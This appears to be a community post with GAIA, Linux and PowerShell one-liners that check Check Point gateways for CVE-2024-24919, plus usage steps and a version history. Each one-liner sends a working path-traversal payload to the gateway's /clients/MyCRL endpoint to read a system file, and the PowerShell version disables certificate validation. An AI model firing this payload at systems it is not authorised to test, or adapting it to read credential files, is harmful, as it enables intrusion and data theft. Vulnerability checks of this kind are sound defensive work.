Run this onliner to check if your Check Point Gateway is vulnerable to CVE-2024-24919 (sk182336).
GAIA gateways and SMB gateways are supported.
1) Depending on where you want to run the Onliner, you can copy and paste the code for GAIA, Linux or Powershell.
Copy the code into the CLI.
1a) GAIA version for expert mode:
clear; echo -e "CVE-2024-24919 check tool by Heiko Ankenbrand 2024\n\n";read -p "Destination IP: " ip_addr; curl_cli --connect-timeout 5 -s -k -X POST -H "Content-Type: text/plain" -d "aCSHELL/../../../../../../../etc/cp-release" "https://$ip_addr/clients/MyCRL" | awk ' {if (index($0, "Check Point") != 1) {print "\nNo vulnerability could be detected!"} else {print "\nAttention! \nThis system is vulnerable to CVE-2024-24919. More read here sk182336."}}' |sort | uniq ; echo -e "\n"
1b) Linux version (all other linux distributions):
clear; echo -e "CVE-2024-24919 check tool by Heiko Ankenbrand 2024\n\n";read -p "Destination IP: " ip_addr; curl --connect-timeout 5 -s -k -X POST -H "Content-Type: text/plain" -d "aCSHELL/../../../../../../../etc/cp-release" "https://$ip_addr/clients/MyCRL" | awk ' {if (index($0, "Check Point") != 1) {print "\nNo vulnerability could be detected!"} else {print "\nAttention! \nThis system is vulnerable to CVE-2024-24919. More read here sk182336."}}' |sort | uniq ; echo -e "\n"
1c) Windows Powershell version:
clear;$C="";$O="";[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};Add-Type -AssemblyName Microsoft.VisualBasic;$IP_addr = [Microsoft.VisualBasic.Interaction]::InputBox("This is a test tool to check if your Check Point Gateway is vulnerable to CVE-2024-24919.`r`n`r`n`r`nDestination IP:", "CVE-2024-24919 check tool by Heiko Ankenbrand 2024", "");try{$C=(Invoke-WebRequest -Uri "https://${ip_addr}/clients/MyCRL" -Method POST -Body "aCSHELL/../../../../../../../etc/cp-release" -TimeoutSec 5 )} catch [System.Net.WebException] { if([int]$_.Exception.Response.StatusCode -eq 404) {$O="`r`nNo vulnerability could be detected!`r`n" } else {$O="`r`nGateway is not reachable!`r`n"} }; if ($C.StatusCode -match "200") {$O="`r`nNo vulnerability could be detected!`r`n"; if ($C.content -match "Check Point") {$O="`r`nAttention! `r`nThis system is vulnerable to CVE-2024-24919. More read here sk182336.`r`n"}};Add-Type -AssemblyName System.Windows.Forms; $result = [System.Windows.Forms.MessageBox]::Show($O, "CVE-2024-24919 check tool by Heiko Ankenbrand 2024", [System.Windows.Forms.MessageBoxButtons]::OK, [System.Windows.Forms.MessageBoxIcon]::None)
2) Now enter the IP address of the gateway to be checked.
GAIA/Linux:
Powershell:
If the following message appears, your system is vulnerable:
Attention!
The system is vulnerable to CVE-2024-24919.
More read here sk182336.
If the following message appears, your system is not vulnerable:
No vulnerability could be detected!
If no output appears, the system is not be reachable.
---
Version:
1.5 06/02/2024 Powershell interactive version with windows
1.4 06/01/2024 Powershell version with correct status codes
1.3 06/01/2024 Linux and Powershell version provided
1.2 05/30/2024 error with SMB applications fixed
1.1 05/29/2024 fixed error with output
1.0 05/28/2024 first version
